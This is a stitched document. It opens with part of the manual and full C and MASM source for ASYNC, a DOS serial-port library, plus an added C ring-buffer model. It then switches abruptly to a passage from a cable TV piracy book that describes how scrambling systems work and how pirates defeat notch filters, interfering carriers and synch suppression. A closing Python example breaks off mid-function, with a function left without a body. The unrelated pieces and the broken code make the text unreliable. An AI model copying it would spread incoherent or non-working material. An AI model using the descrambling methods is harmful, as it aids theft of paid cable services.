there are #defines in the header file that define the values to be used. It
would be more bug proof if AsyncStop was called via the atexit() function
(check your compiler manual).

AsyncInit() will return a non-zero value upon an error (when the COM port is
not there).

AsyncClear( void)

Clears the internal buffers.

AsyncOut( int c)

Sends out a character.

AsyncIn( void)

Returns the next character in the buffer or a NULL upon an empty buffer.
Use AsyncInStat() to check for the number of characters in the buffer.

AsyncHand( int handshake)

Sets the status of the handshaking lines. The values are defined in the
header file and can be or'd together. A typical call would look like this:
AsyncHand( DTR | RTS);

Roy M. Silvernail found confusion in this rather simple explanation of
AsyncHand(). I thought of editing the above description, but his description
is better than mine, so here it is:

"The AsyncHand routine wants the whole set of flags upon invocation. At
first, I had tried AsyncHand(~DTR) to drop DTR, but soon found it didn't
work. With the 2 main control bits being DTR and RTS, AsyncHand(RTS)
drops DTR just fine, and (of course) AsyncHand(DTR | RTS) raises it once
again."

AsyncSet( int Baud, int Control)

This sets the baud rate, parity, etc, of the serial line. The parameter 'Baud' is
the baud rate (ie 1200, 2400, 9600, etc), and 'Control' is a number that
represents parity, length and stop bits. There are defines for this in
ASYNC.H, but here are a few commonly used examples:

AsyncSet( 2400, BITS_8 | STOP_1 | NO_PARITY ) for 2400 baud 8N1.
AsyncSet( 9600, BITS_7 | STOP_1 | EVEN_PARITY ) for 9600 baud 7E1.

AsyncInStat( void)

This function returns the number of characters in the input buffer.

AsyncOutStat( void)

Returns the number of characters in the output buffer.

AsyncStat( void)

Returns the status of the handshaking lines. Use the & and | operators with
the values defined in the header file to extract any useful information out of
this value.


ASYNC.H

#ifndef _ASYNC_H_
#define _ASYNC_H_

int AsyncInit( int Port);

void AsyncStop( void),
     AsyncClear( void),
     AsyncOut( int c),
     AsyncHand( int handshake),
     AsyncSet( int Baud, int Control);

int AsyncIn( void),
    AsyncInStat( void),
    AsyncOutStat( void);

unsigned AsyncStat( void);

#define COM1 0
#define COM2 1
#define COM3 2
#define COM4 3

/* Defines for Com Port Parameters, the second parameter to AsyncSet() */

#define BITS_8      0x03
#define BITS_7      0x02
#define STOP_1      0x00
#define STOP_2      0x04
#define EVEN_PARITY 0x18
#define ODD_PARITY  0x08
#define NO_PARITY   0x00

/* Defines for AsyncHand() */

#define DTR      0x01
#define RTS      0x02
#define USER     0x04
#define LOOPBACK 0x10

/* Defines for AsyncStat() */

#define D_CTS    0x0100
#define D_DSR    0x0200
#define D_RI     0x0400
#define D_DCD    0x0800
#define CTS      0x1000
#define DSR      0x2000
#define RI       0x4000
#define DCD      0x8000
#define PARITY   0x0004
#define THREMPTY 0x0020
#define BREAKDET 0x1000

#endif
ASYNC.ASM

; interrupt driven serial port I/O module.
; written by David Kessner
; modified for MASM 5.1 compatibility on 1994-04-11 by WK

EOI         equ 020h            ; 8259 end-of-interrupt
Ctrl8259_0  equ 020h            ; 8259 port
Ctrl8259_1  equ 021h            ; 8259 port (Masks)
BufSize     equ 8196            ; Buffer Size

_DATA SEGMENT WORD PUBLIC 'DATA'
assume cs:DGROUP, ds:DGROUP, ss:DGROUP

; Various things to be set upon AsyncInit()

VectorNum   db ?                ; Vector Number
EnableIRQ   db ?                ; Mask to enable 8259 IRQ
DisableIRQ  db ?                ; Mask to disable 8259 IRQ
VectorSeg   dw ?                ; Old Vector Segment
VectorOfs   dw ?                ; Old Vector Offset

; Register Addresses for the 8250 UART

Port        dw ?                ; Port Base Address
RegStart    LABEL WORD
THR         dw ?                ; Transmitter Holding Register
RDR         dw ?                ; Receiver Data Register
BRDL        dw ?                ; Baud Rate Divisor, Low byte
BRDH        dw ?                ; Baud Rate Divisor, High Byte
IER         dw ?                ; Interrupt Enable Register
IIR         dw ?                ; Interrupt Identification Register
LCR         dw ?                ; Line Control Register
MCR         dw ?                ; Modem Control Register
LSR         dw ?                ; Line Status Register
MSR         dw ?                ; Modem Status Register

; Buffer Data

RecBuffer   db BufSize DUP (?)  ; Receive Buffer
RecHead     dw ?                ; Buffer Head Pointer
RecTail     dw ?                ; Buffer Tail Pointer
TransBuffer db BufSize DUP (?)  ; Transmit Buffer
TransHead   dw ?                ; Buffer Head Pointer
TransTail   dw ?                ; Buffer Tail Pointer

; Register Offsets for the UART

RegOffsets  dw 0,0,0,1,1,2,3,4,5,6

_DATA ENDS

_TEXT SEGMENT WORD PUBLIC 'CODE'
assume cs:_TEXT, ds:DGROUP, ss:DGROUP
PUBLIC _AsyncInit, _AsyncClear, _AsyncStop
PUBLIC _AsyncIn, _AsyncOut, _AsyncSet
PUBLIC _AsyncHand, _AsyncStat, _AsyncInStat
PUBLIC _AsyncOutStat


; AsyncClear    Empty the receive buffer
;   void AsyncClear( void)

_AsyncClear PROC NEAR
    cli
    push ax
    mov ax, offset RecBuffer
    mov [RecHead], ax
    mov [RecTail], ax
    mov ax, offset TransBuffer
    mov [TransHead], ax
    mov [TransTail], ax
    pop ax
    sti
    ret
_AsyncClear ENDP

; AsyncInit     Install ISR
;   void AsyncInit( int port)
;   Where Port is
;       0 = COM1
;       1 = COM2
;       2 = COM3
;       3 = COM4

_AsyncInit PROC NEAR
CommPort equ bp+4
    push bp
    mov bp, sp
;----- Set various things according to com port number
    mov ax, [CommPort]
;----- COM1
    cmp ax, 0
    jne _AsyncInit_1
    mov [Port], 03F8h
    mov [VectorNum], 0Ch
    mov [EnableIRQ], 0EFh
    mov [DisableIRQ], 10h
    jmp _AsyncInit_Done
_AsyncInit_1:
;----- COM2
    cmp ax, 1
    jne _AsyncInit_2
    mov [Port], 02F8h
    mov [VectorNum], 0Bh
    mov [EnableIRQ], 0F7h
    mov [DisableIRQ], 08h
    jmp _AsyncInit_Done
_AsyncInit_2:
;----- COM3
    cmp ax, 2
    jne _AsyncInit_3
    mov [Port], 03E8h
    mov [VectorNum], 0Ch
    mov [EnableIRQ], 0EFh
    mov [DisableIRQ], 10h
    jmp _AsyncInit_Done
_AsyncInit_3:
;----- COM4
    mov [Port], 02E8h
    mov [VectorNum], 0Bh
    mov [EnableIRQ], 0F7h
    mov [DisableIRQ], 08h
_AsyncInit_Done:
;----- Compute Register locations
    mov cx, 10
    mov bx, offset RegOffsets
    push di
    mov di, offset RegStart
_AsyncInit_4:
    mov ax, [bx]
    add ax, [Port]
    mov [di], ax
    add bx, 2
    add di, 2
    loop _AsyncInit_4
    pop di
;----- Initialize Buffer
    call _AsyncClear
;----- Save and reassign interrupt vector
    push ds                     ; Save Old Vector
    mov al, [VectorNum]
    mov ah, 35h
    int 21h
    mov [VectorSeg], es
    mov [VectorOfs], bx
    mov al, [VectorNum]
    push cs                     ; Set New Vector
    pop ds
    mov dx, offset AsyncISR
    mov ah, 25h
    int 21h
    pop ds
;----- Enable 8259 interrupt (IRQ) line for this async adapter
    in al, Ctrl8259_1
    and al, [EnableIRQ]
    out Ctrl8259_1, al
;----- Enable 8250 Interrupt-on-data-ready
    mov dx, [LCR]               ; Read Line control register and clear
    in al, dx                   ; bit 7, the Divisor Latch Address
    and al, 07Fh
    out dx, al
    mov dx, [IER]
    mov al, 0                   ; we're gonna test the UART first
    out dx, al
    in al, dx                   ; if this isn't 0, there's no UART
    cmp al, 0
    jnz _AsyncInit_222
    mov al, 3
    out dx, al
;----- Clear 8250 Status and data registers
_AsyncInit_10:
    mov dx, [RDR]               ; Clear RDR by reading port
    in al, dx
    mov dx, [LSR]               ; Clear LSR
    in al, dx
    mov dx, [MSR]               ; Clear MSR
    in al, dx
    mov dx, [IIR]               ; Clear IIR
    in al, dx
    test al, 1
    jz _AsyncInit_10
;----- Set Bit 3 of MCR -- Enable interrupts
    mov dx, [MCR]
    in al, dx
    or al, 08h
    out dx, al
;----- Clear Buffer Just in case
    call _AsyncClear
;----- Return
    xor ax, ax
_AsyncInit_222:
    pop bp
    ret
_AsyncInit ENDP


; AsyncStop     Uninstall ISR
;   void AsyncStop( void)

_AsyncStop PROC NEAR
    push bp
    mov bp, sp
;----- Mask (disable) 8259 IRQ Interrupt
    in al, Ctrl8259_1
    or al, [DisableIRQ]
    out Ctrl8259_1, al
;----- Disable 8250 interrupt
    mov dx, [LCR]
    in al, dx
    and al, 07Fh
    out dx, al
    mov dx, [IER]
    xor al, al
    out dx, al
;----- Set bit 3 in MCR to 0
    mov dx, [MCR]
    in al, dx
    and al, 0F7h
    out dx, al
;----- Interrupts are disabled. Restore saved interrupt vector.
    push ds
    mov al, [VectorNum]
    mov ah, 25h
    mov dx, [VectorOfs]
    mov ds, [VectorSeg]
    int 21h
    pop ds
;----- Return
    pop bp
    ret
_AsyncStop ENDP

; AsyncISR      Async Interrupt Service Routine
;   To be called only as an interrupt.

AsyncISR PROC FAR
    push ax                     ; Save Registers
    push bx
    push ds
    push dx
    mov ax, @data               ; Address local data with ds
    mov ds, ax
    mov dx, [IIR]               ; Check if data actually received
    in al, dx
    and al, 06h
    cmp al, 04h
    je AsyncISR_receive
    cmp al, 02h
    jne AsyncISR_end
;----- Transmit a byte
AsyncISR_transmit:
    mov bx, [TransTail]
    cmp bx, [TransHead]
    jne AsyncISR_1
    mov dx, [IER]               ; Buffer empty
    mov al, 1
    out dx, al                  ; Disable THR empty interrupt
    jmp AsyncISR_end
AsyncISR_1:
    mov al, byte ptr [bx]       ; Get Byte
    inc [TransTail]             ; Update buffer pointer
    cmp [word ptr TransTail], offset TransBuffer + BufSize
    jb AsyncISR_2
    mov [TransTail], offset TransBuffer
AsyncISR_2:
    mov dx, [THR]
    out dx, al
    jmp AsyncISR_end
;----- Receive a byte
AsyncISR_receive:
    mov dx, [RDR]               ; Get Byte
    in al, dx
    mov bx, [RecHead]           ; Store Byte in buffer
    mov byte ptr [bx], al
    inc bx                      ; Update RecHead
    cmp bx, offset RecBuffer + BufSize
    jb AsyncISR_10
    mov bx, offset RecBuffer
AsyncISR_10:
    cmp bx, [RecTail]
    jne AsyncISR_20
    mov bx, [RecHead]           ; Cancel Pointer advance on overflow
AsyncISR_20:
    mov [RecHead], bx           ; Store new pointer
AsyncISR_end:
    mov al, EOI                 ; Signal end of interrupt
    out Ctrl8259_0, al
; Disable and re-enable interrupts so that there
; is an interrupt edge.
    mov dx, [IER]               ; Point to Interrupt Enable Register.
    in al, dx                   ; Read the current value.
    push ax                     ; Save it.
    mov al, 0                   ; Disable the interrupts.
    out dx, al
    pop ax                      ; Restore original mask.
    out dx, al                  ; Re-enable interrupts.
    pop dx                      ; Restore saved registers.
    pop ds
    pop bx
    pop ax
    iret
AsyncISR ENDP


; AsyncIn       Gets a byte from the input buffer
;   int AsyncIn( void)

_AsyncIn PROC NEAR
    push bp
    mov bp, sp
    xor ax, ax                  ; Pre-Set result to 0
    mov bx, [RecTail]
    cmp bx, [RecHead]
    je _AsyncIn_return
    mov al, byte ptr [bx]
    inc [RecTail]
    cmp [word ptr RecTail], offset RecBuffer + BufSize
    jb _AsyncIn_return
    mov [RecTail], offset RecBuffer
_AsyncIn_return:
    pop bp
    ret
_AsyncIn ENDP

; AsyncOut      Output a byte
;   void AsyncOut( int c)

_AsyncOut PROC NEAR
    push bp
    mov bp, sp
    mov ax, [bp+4]              ; get argument
    mov bx, [TransHead]
    mov cx, bx
    inc cx                      ; Compute NEW buffer position
    cmp cx, offset TransBuffer + BufSize
    jb _AsyncIn_1
    mov cx, offset TransBuffer
_AsyncIn_1:
    cmp cx, [TransTail]         ; Wait for space in buffer
    je _AsyncIn_1
    mov byte ptr [bx], al       ; Add byte to buffer
    mov [TransHead], cx         ; Update pointer
    mov dx, [IER]               ; Enable THR empty interrupt
    mov al, 3
    out dx, al
    pop bp
    ret
_AsyncOut ENDP
; AsyncSet      Set communication parameters
;   void AsyncSet( int Baud, int Control)
;   Baud = 150, 300, 600, 1200, 2400, 4800, 9600, 19200, 28800, 38400, 57600
;   Control = The value to place in the LCR

_AsyncSet PROC NEAR
Baud    equ bp+4
Control equ bp+6
    push bp
    mov bp, sp
    mov bx, [Baud]
    cmp bx, 0
    je _AsyncSet_abort
    mov ax, 0C200h              ; Baud rate divisor = 115200 / Baud
    mov dx, 0001h               ; 115200 = 0001C200h
    div bx
    mov cx, ax
    cli
    mov dx, [LCR]               ; Set Port Toggle to BRDL/BRDH registers
    mov al, 0ffh
    out dx, al
    mov dx, [BRDL]              ; Set Baud Rate
    mov al, cl
    out dx, al
    mov dx, [BRDH]
    mov al, ch
    out dx, al
    mov dx, [LCR]               ; Set LCR and Port Toggle
    mov ax, [Control]
    and al, 07Fh
    out dx, al
    sti
_AsyncSet_abort:
    pop bp
    ret
_AsyncSet ENDP

; AsyncInStat   Returns the # of characters in buffer
;   int AsyncInStat( void)

_AsyncInStat PROC NEAR
    push bp
    mov bp, sp
    mov ax, [RecHead]
    sub ax, [RecTail]
    jge _AsyncInStat_10
    add ax, BufSize
_AsyncInStat_10:
    pop bp
    ret
_AsyncInStat ENDP


; AsyncOutStat  Returns the # of characters in buffer
;   int AsyncOutStat( void)

_AsyncOutStat PROC NEAR
    push bp
    mov bp, sp
    mov ax, [TransHead]
    sub ax, [TransTail]
    jge _AsyncOutStat_10
    add ax, BufSize
_AsyncOutStat_10:
    pop bp
    ret
_AsyncOutStat ENDP

; AsyncHand     Sets various handshaking lines
;   void AsyncHand( int Hand)

_AsyncHand PROC NEAR
Hand equ bp+4
    push bp
    mov bp, sp
    mov dx, [MCR]
    mov ax, [Hand]
    or al, 08h                  ; Keep interrupt enable ON
    out dx, al
    pop bp
    ret
_AsyncHand ENDP

; AsyncStat     Returns Async/Modem status
;   unsigned AsyncStat( void)
;   MSR is returned in the high byte, LSR in the low byte

_AsyncStat PROC NEAR
    push bp
    mov bp, sp
    mov dx, [MSR]
    in al, dx
    mov cl, al
    mov dx, [LSR]
    in al, dx                   ; LSR in low byte
    mov ah, cl                  ; MSR in high byte
    pop bp
    ret
_AsyncStat ENDP
_TEXT ENDS
END
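Added as an example (not part of the ASYNC package): a C model of the receive ring buffer that AsyncISR, AsyncIn and AsyncInStat implement in assembly above, so that the wrap-around, the drop-on-overflow rule and the ambiguity of AsyncIn returning 0 both for "empty" and for a received 0x00 byte can be exercised without a UART. BUF_SIZE, the struct and the function names are this example's own.

```c
/* Added example: C model of the ASYNC.ASM receive ring buffer (not from the package). */
#include <stdio.h>

#define BUF_SIZE 8              /* small on purpose; ASYNC.ASM uses BufSize = 8196 */

struct ring {
    unsigned char buf[BUF_SIZE];
    int head;                   /* next write position (RecHead in the asm) */
    int tail;                   /* next read position  (RecTail in the asm) */
    unsigned long dropped;      /* bytes discarded on overflow (not counted by ASYNC) */
};

void ring_clear(struct ring *r)     /* AsyncClear(): head = tail = start of buffer */
{
    r->head = r->tail = 0;
    r->dropped = 0;
}

/* AsyncISR receive path: store the byte, advance head with wrap-around, but
 * cancel the advance when head would catch up with tail. The byte is still
 * written into the unused slot, so an overrun silently loses the newest byte. */
void ring_isr_receive(struct ring *r, unsigned char c)
{
    int next = r->head + 1;
    r->buf[r->head] = c;
    if (next >= BUF_SIZE) next = 0;
    if (next == r->tail) { r->dropped++; return; }   /* buffer full: drop */
    r->head = next;
}

/* AsyncInStat(): (head - tail) mod BUF_SIZE; at most BUF_SIZE - 1 bytes. */
int ring_count(const struct ring *r)
{
    int n = r->head - r->tail;
    return n < 0 ? n + BUF_SIZE : n;
}

/* AsyncIn() as written returns 0 for "empty" and also for a received NUL byte;
 * callers must check AsyncInStat() first. This model returns -1 on empty so
 * the two cases are distinguishable. */
int ring_read(struct ring *r)
{
    int c;
    if (r->tail == r->head) return -1;
    c = r->buf[r->tail];
    if (++r->tail >= BUF_SIZE) r->tail = 0;
    return c;
}

/* Scenario 1: more bytes arrive than fit before the reader drains the buffer.
 * Returns how many bytes were readable afterwards (BUF_SIZE - 1 == 7). */
int demo_overrun(void)
{
    struct ring r;
    int i, got = 0;
    ring_clear(&r);
    for (i = 0; i < 10; i++) ring_isr_receive(&r, (unsigned char)(0x30 + i));
    while (ring_read(&r) != -1) got++;
    return got;
}

/* Scenario 2: FIFO order survives wrap-around. Write 5, read 3, write 5 more
 * (head wraps past the end), then read everything back. Returns 1 if the
 * count and the byte order are both right, 0 otherwise. */
int demo_wrap_order(void)
{
    struct ring r;
    int i, c, expect = 3;
    ring_clear(&r);
    for (i = 0; i < 5; i++) ring_isr_receive(&r, (unsigned char) i);
    for (i = 0; i < 3; i++) ring_read(&r);
    for (i = 5; i < 10; i++) ring_isr_receive(&r, (unsigned char) i);
    if (ring_count(&r) != 7) return 0;
    while ((c = ring_read(&r)) != -1)
        if (c != expect++) return 0;
    return expect == 10;
}

int main(void)
{
    printf("overrun: %d bytes readable out of 10 received\n", demo_overrun());
    printf("wrap-around order preserved: %s\n", demo_wrap_order() ? "yes" : "no");
    return 0;
}
```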
Warning

Under the Irish Broadcast Act 1990 it is illegal to operate MMDS
downconverters on an MMDS net without permission of the net
owner. It is an offence to manufacture, sell or install pirate cable or
MMDS descramblers.

The fines under the 1990 Broadcast Act are significant. The first offence
of pirating a signal whether by cable or MMDS is punishable by a
fine of up to £1000 and or up to three months in prison. Distributing
pirate descramblers or engaging in any form of organised piracy is
punishable by fines of up to £20000 and up to two years in prison.


In the UK, piracy of cable television signals is an offence under the 
relevant laws. In most European countries, legislation to protect 
cablenets exists. Due to the localised nature of a cablenet, the cable 
company are going to find out about any piracy sooner or later. The 
chances of being caught are high. If a company does not know about 
a hacker, there is always the possibility that some nasty neighbour 
will inform on him. 


Clearly, I am not advocating that the reader should use this 
information to defraud a cable or MMDS company. This information 
is presented for educational purposes only. If you decide to misuse 
this information, consider this question; how do you know that the 
cable or MMDS operator hasn’t already read a copy of this book and 
is therefore ready and waiting? 
Section 1: Cable Scrambling Systems


The gulf between satellite based scrambling systems and cable based 
scrambling systems has narrowed dramatically. This is due mainly to the 
relatively low cost digital options now available to designers. Another more 
pressing factor here is that the systems developed today are aimed at both 
cable television and satellite television markets. A good system should 
therefore be usable in both applications. 


The dual usage can be seen clearly with systems like Syster and 
Cryptovision. The Syster system is intended to replace the Canal Plus 
Discret system terrestrially and it is also used on satellite by Canal Plus. The 
Cryptovision is widely used in Ireland and Scandinavia on cablenets and is 
currently used by SSVC on satellite. 


However these systems represent the high end of the market. The numbers
of subscribers on networks using these scrambling systems number in the
hundreds of thousands. The smaller networks are forced to settle for the
cheaper options and the questionable protection of any anti-piracy legislation
that may be available in that country.


The one factor that works in the favour of the smaller networks is variety. 
With a number of different scrambling systems in operation, the risk of 
piracy will diminish according to the number of subscribers on the network. 
Therefore if the network has only a few thousand subscribers then a low 
cost system may be enough. After all, the cable technicians will get to hear 
of anyone making pirate decoders sooner or later. Perhaps it could be 
described as means, motive and opportunity. 


The last few years of abject piracy on satellite television channels have
created thousands of technically competent hackers. In Europe, the
information on the cable scrambling systems was hard to obtain but now it is
readily available in books, magazines, BBSes and on the internet. The
majority of the cable systems have been hacked and are considered little
more than training runs before the hacker moves on to hacking satellite
systems.


Many cablenet managers consider that most people are honest and will not
set out to use a pirate descrambler on a cablenet. I would tend to agree with
this. Most people have neither the motivation nor the time to bother with
trying to acquire a pirate descrambler. They are generally too busy trying to
survive. It is the people who have a lot of free time on their hands who are
the most likely to opt for the premium services.
The threat of hacking is directly related to the type of scrambling in
operation. If the cablenet uses blanket scrambling on all channels, then
there is a stronger likelihood of a concentrated piracy effort. The logic of this
is that each house will have the necessary starting point - the descrambler.
The decoders will also be a lot easier to acquire. As a direct result, the
piracy in this case will tend more in the direction of modifying the official
descrambler. The negative effect of blanket scrambling is that it creates a
lot of potential pirates.


In the case where only the premium channels are scrambled, the situation 
changes drastically and more so to the benefit of the cablenet. The demand 
for premium channels, especially on cable is not traditionally high. The 
option of receiving the same premium channels on satellite along with a lot 
more tends to convince people to get satellite television systems and 
subscribe that way. There is also the probability that the channels required 
are hacked on satellite. 


More by accident than design, the cablenets opting for selective scrambling 
reduce their vulnerability to hacking but at the same time, the low level 
piracy will still be a problem. The selectively scrambled cablenet can 
manage the distribution of decoders. This is a trade-off. There will always 
be low level piracy on a cablenet with selective scrambling. 


Low level piracy is where people can tap into the cable system illegally. This
can be as simple as running a piece of coaxial cable alongside the main
cable feed. It is relatively easy for the cable company to detect illegal taps
on their net using Time Domain Reflectometry. Other aspects can also be
applied such as offering a bounty to informers to turn in people pirating the
cable service. While in some countries this would work, it would have
questionable value in Ireland.


On the surface the threat may not seem significant when compared to 
satellite television piracy but when the figures are compared, a hack on a 
cablenet system is far more devastating. The reason for this is that most of 
the systems hacked are stone age relics and there is very little that can be 
done to stop the hacks technologically speaking. 


Of course legalistically speaking, it is like shooting fish in a barrel. The laws 
on cable television are there to protect the cable companies. They paid for 
them and in most cases, cable and MMDS companies have to pay a hefty 
licence fee to the government each year. 


So where does the threat to cable television systems come from? Logically,
it is those with the knowledge and the access to the equipment that would
pose the most risk. If there is a University or Technical College in the
cablenet area, then the students there will have a go. Of course some might
say that the fact that the Black Book is in most college libraries and most
educational institutes now have access to the internet has a lot to do with
this.

[Figure: Addressing Systems - Plain Jane. Block diagram showing the data
and synch carriers across Band 1, Band 2, Band 3 and Hyper Band 4/5; the
Hyper Band (or VHF) input is converted with a fixed frequency local
oscillator to a UHF or VHF output.]

The Plain Jane system is rarely used as it offers extremely limited security.
Many cablenets are permitted to operate channels in the Hyper Band but
these channels, if used, will generally be test channels or scrambled
channels.


Addressing


There are basically two methods of descrambler addressing in use on cable
systems: In Band Signal Addressing and Out Of Band Addressing.

In Band signal addressing is the more complex and the more secure of the
two systems. The address of the descrambler to be enabled is transmitted in
the vertical blanking interval or on one of the non-video lines. The majority of
addressable systems use the VBI for addressing and authorisation level and
use the non-video lines for the descrambling algorithm. If the actual
descrambling algorithm is stored in the descrambler then the variable data
will be transmitted in the non-video lines. This method is often used with
pseudo-random line inversion systems.


Most of the current scrambling systems in use in Europe use in band 
addressing. The best examples of this type of addressing are the Discret, 
Cryptovision and Nagra Syster systems. 


The new FilmNet cable system, the imaginatively named CableCrypt, also 
uses in band addressing but this system is a synch replacement system 
based on the IRDETO LuxCrypt system. It uses digital audio so that simple 
video only hacks will not be sufficient. This system is compromised by what 
is effectively a blocker. It is based on a PIC microcontroller. It is not known 
how badly the hack is affecting the subscriber levels on services using this 
system. 


Out Of Band addressing is rarely used alone. With this system the 
addressing data and the authorisation data is transmitted on a carrier 
outside either the bandwidth of the signal or the band of channels. These 
carriers can easily be detected by a spectrum scan with a radio scanner 
with an oscilloscope hooked up to the output. 


The out of band addressing technique is a potential security risk. The 
hackers can detect these channels and eventually use them against the 
descrambler. The cube, described later in this chapter, is a prime example of 
this. In band addressing means that the hacks would be more likely to be 
hardware modifications to the official descramblers. 
Primitive Systems 


Watching the evolution of cable scrambling systems is like watching a rock 
grow. Of course from time to time there is some volcanic eruption that 
creates a new layer but the vast majority of the terrain remains. 


The more primitive systems are based on signal denial, signal interference 
and signal translation. These systems are now fading out of use primarily 
because they offer little security. However it is not unusual to find such 
systems in use on small cablenets. 


Notch Filters 


One of the simplest methods of denying service is to place a notch filter on 
the subscriber's line. The notch filter will be tuned so as to take out a 
particular channel. The down side of this for the cable company is that a 
control box is required for every few houses passed. If the control box is 
properly secured then there is little that can be done to restore the channels 
apart from tapping into another subscriber's line. 


Any interference with either the main signal carrying cable or the cable of 
another subscriber will easily be detected. In many cases, all that is required 
is a quick visual inspection of the cables entering a house. 


This kind of system, while not being a true scrambling system, is a very 
effective one. It is very low tech and correspondingly very cheap. 


The hacker solution for this type of system is to set up a cable transformer 
to pick up the signal leakage from a signal carrying cable. The principle is 
very simple though in practice, the results vary. 


The cable transformer is simply a piece of coaxial cable placed alongside a 
signal carrying cable. One end of the coaxial cable is then connected to a 
wideband amplifier. In most housing estates, the main signal cable is fed 
along the sides of the houses. This makes it extremely easy to conceal the 
“pirate” coaxial cable. 


The problem with the hack is that it is widely known about. Therefore the 
cablenets generally take measures to protect the main signal carrying cable 
by encasing it in a metal pipe. As a result the hack has to be used on the 
subscriber drop cables. 


Another hack depended on the depth of the notch. A tuned amplifier with 
enough gain was merely inserted in the line. It worked with the earlier LC 
notch filters. The advent of more secure or deeper notch filters defeated this 
hack. 
Plain Jane 


The “Plain Jane” system, like the notch filter, is not really a scrambling 
system. It is merely frequency shifting. The television channels were 
frequency shifted to a block outside the bandwidth of the normal television 
tuner. 


Some of the Plain Jane systems used the frequency block in between VHF 
Band 3 and UHF Band 4. This was accidentally defeated by television and VCR 
manufacturers. They used tuners that could cover these frequencies and 
advertised their sets as being “cable ready”. 


In the early eighties, there were a number of companies trying to sell VHF 
based systems in the UK. The majority of UK televisions only had UHF 
tuners and therefore would not have been able to pick up VHF. The 
situation today is different. Most of the televisions and VCRs sold are sold 
as being cable ready. 


The Plain Jane system is not widely used at present and only an idiot of a 
system manager would choose such a system. With the advent of more 
television channels, some cablenets in Ireland are licensed to use the 
frequency block between Band III and Band IV. To date the main use for 
these channels has been for the premium channels such as Sky Movies 
and Sky Sports but once tests were completed, scrambling was introduced 
on these channels. 


On cablenets where there is partial scrambling, the frequency block 
between Band III and IV is used for testing of new channels. There is very 
little use of this form of signal protection in Europe. 


Interfering Carrier 


The Interfering Carrier is a low security system that is more suited to cable 
television applications than to satellite television. It is also a technique that 
can reduce the overall quality of the received signal. The interfering carrier 
can be applied at the signal frequency, at the IF or at baseband. It is generally 
situated in an area of low video activity. The level of the interfering carrier 
determines the effectiveness. When the level of the interfering carrier is 
close to that of white level, severe interference will result. All that is required 
to remove the carrier is a very high Q filter tuned to the frequency of the 
carrier. 


There are two methods that are used to improve the security of the system; 
multiple carriers and varying frequency carrier. From a hacker's point of 
view, the multiple carrier version is the easier of the two to defeat. The 
frequency of each carrier would be static and therefore a filter could be 
tweaked for the best result. 


The official descrambler would use a switched surface acoustic wave filter, 
(SAWF), to notch out the interfering carriers. The notching or switching 
sequence would be controlled either by addressing or by a programmable 
read only memory IC, (PROM), in the official descrambler. The filtering in 
the hacker descrambler would be carried out using standard LC circuits. 
The quality may not be as good as the official descrambler but it does 
produce a watchable picture. 


The variable frequency carrier is more secure and will deter most 
hackers but is not secure against a dedicated hacker, or indeed pirate. In 
this system a carrier of constantly varying frequency is injected into the 
baseband. The multiples of the line frequency are the commonest centre 
frequencies for these carriers. The commonest technique used to hack this 
system is the tracking filter. Such a descrambler is difficult to construct as it 
requires a lot of adjustments before it will operate properly. 


The average hacker will not generally have the expertise, the test 
equipment or the time necessary to develop a descrambler. This is not so 
much a reflection on the average hacker's skill as the nature of the hack. 
This is an RF based hack that requires RF design expertise, and many of 
the hackers in Europe are more used to coping with baseband video and 
audio than with RF. 


Unfortunately for the cable system owners life is not so simple. A hack on 
such a system will eventually spread so that it becomes a major problem. 


In recent years, this form of scrambling has been dropping out of usage. It is 
being replaced by more complex systems though again, the glacial pace of 
the cable television industry means that this form of scrambling may be in 
use on some smaller cablenets for a few years to come. 


It is a cheap option that can lure a cash strapped cable company. However, 
sooner or later the company will have to upgrade to a more secure system. 


[Figure: Interfering Carrier Scrambling. Two baseband spectrum diagrams 
showing the video signal, the colour subcarrier, the audio subcarrier and 
the position of the interfering carrier.] 

Interfering carrier scrambling applied at baseband level. The carrier is 
placed between the video and audio signals in the baseband spectrum. A 
simple notch filter can remove it. 

In this variation, the interfering carrier is placed in the video signal. 
This makes it harder to remove. It is essentially the RF method. The 
interfering carrier is added and removed when the signal is at the IF stage 
rather than at baseband. Surface Acoustic Wave Filters are used for this 
process. The SAWFs can be fabricated with a very narrow stop band, 


Synch Suppression And Attenuation 


The main target for these forms of scrambling is the synch pulse section of 
the video line. When the synch pulse section of the line is interfered with, 
the television will not be able to lock up the picture. Often in this form of 
scrambling, the frame pulse section is left unscrambled. 


The terms suppression and attenuation are often used interchangeably in 
cable television security. Attenuation is where the magnitude of the synch 
pulses is reduced and suppression is where the level of the synch pulses 
is changed relative to the active video. To anyone used to working with 
baseband systems, this difference is clear. The synch pulses, in a 
baseband attenuated synch system, will be smaller than those in a normal 
video line but they will not necessarily be shifted up into the active video 
region of the line. 


However with an RF based system, the scrambling is applied by varying the 
gain of an RF amplifier. Since the amplitude of the signal changes, this 
means that the position of the synch pulses with respect to the active video 
changes. Of course when the signal is demodulated into baseband, the 
synch pulse is both attenuated and level shifted upwards into the active 
video region. The result of all this is that in cable television scrambling, 
these techniques are described as suppression. 


The trend on cable based scrambling systems for the last fifteen years or so 
has been decidedly low tech and RF based. This is because the 
suppression techniques are easy to apply and remove from an RF signal. 
The method for applying and removing the techniques from the signal is 
simply amplitude modulation with a variable gain amplifier. 


If the scrambling system applies an attenuating signal, then the descrambler 
has to apply a reciprocal amplifying signal. Thus the official decoders 
do not actually have to demodulate the signal as such. This remarkable fact 
simplifies the descrambler considerably. It also means that any system 
using this technique is totally compromised if the modulating waveform can 
be replicated. 
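To make the attenuation versus suppression distinction concrete, the following added example (not from the book; the one-line video model, sample counts and modulation depth are all constructed) simulates a line-frequency sine wave applied as RF gain, what a receiver then demodulates, and the reciprocal gain that restores the line without ever demodulating the video.

```python
import math

# Constructed one-line model for this example (not from the book):
# positive-going video, 0.0 = synch tip, 0.3 = blanking, 1.0 = peak white.
SAMPLES = 64        # samples per video line
SYNC_END = 8        # samples 0..7 are the line synch pulse
PORCH_END = 12      # samples 8..11 are the back porch at blanking level
SYNC_TIP, BLANKING, WHITE = 0.0, 0.3, 1.0


def video_line():
    """Constructed baseband line: synch pulse, back porch, then a grey ramp."""
    line = []
    for n in range(SAMPLES):
        if n < SYNC_END:
            line.append(SYNC_TIP)
        elif n < PORCH_END:
            line.append(BLANKING)
        else:  # active video ramps from blanking level up to peak white
            frac = (n - PORCH_END) / (SAMPLES - 1 - PORCH_END)
            line.append(BLANKING + (WHITE - BLANKING) * frac)
    return line


def to_envelope(v):
    """Negative-modulation AM: synch tip is full carrier, peak white is 10%."""
    return 1.0 - 0.9 * v


def from_envelope(e):
    """What a television's demodulator recovers from an RF envelope."""
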